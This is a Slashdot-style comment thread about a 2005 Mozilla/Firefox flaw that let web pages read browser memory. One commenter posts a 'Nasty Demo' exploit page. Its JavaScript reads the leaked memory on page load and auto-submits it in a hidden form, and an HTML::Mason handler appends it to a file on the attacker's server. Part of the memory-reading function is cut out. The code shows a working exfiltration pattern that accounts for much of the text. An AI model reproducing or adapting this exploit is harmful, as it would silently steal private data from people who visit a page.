Mozilla / Firefox Memory Exposure Vulnerability

JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."

Re:Confusing write-up

[cjsnell]

Can a remote site actually get access to this information, or is it only displayable on the screen?

The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.

Yes, this is very dangerous.

Re:Did the Mozilla/Firefox guys ignore a warning?

[Vaevictis666]

From the bugzilla bug report (copy it, they disallow /. links):

Opened: 2005-04-01 13:40 PDT
Last modified: 2005-04-01 22:39 PDT
Resolution: FIXED

So yes they did, it was fixed in under 10 hours, and published 3 days later.

Ok, confirmed

[cjsnell]

You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason page to do this:

<HTML>
<HEAD>
<TITLE>Nasty Demo</TITLE>
</HEAD>
<BODY BGCOLOR='#FFFFFF' COLOR='#222222' onLoad="readMemory();">
<SCRIPT language="JavaScript">
function genGluck(str){
var x = str;
var rx=/end/i;
x = x.replace(rx,function($1){
$1.match(rx);
return "";
});
x = x.replace(/^end/,"");
return x;
}

function readMemory()
{

First peice of readMemory() removed to satisfy Slashdot crapfilter

mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

document.nasty.result.value = mem;

document.nasty.submit();

}

</SCRIPT>
<FORM METHOD=POST NAME='nasty'>
<INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'>
</FORM>
<BR><BR>
</BODY>
</HTML>

<%args>
$result => ''
</%args>
<%init>
open(OUTFILE,'>>/tmp/outfile');
print $result OUTFILE;
close(OUTFILE);
</%init>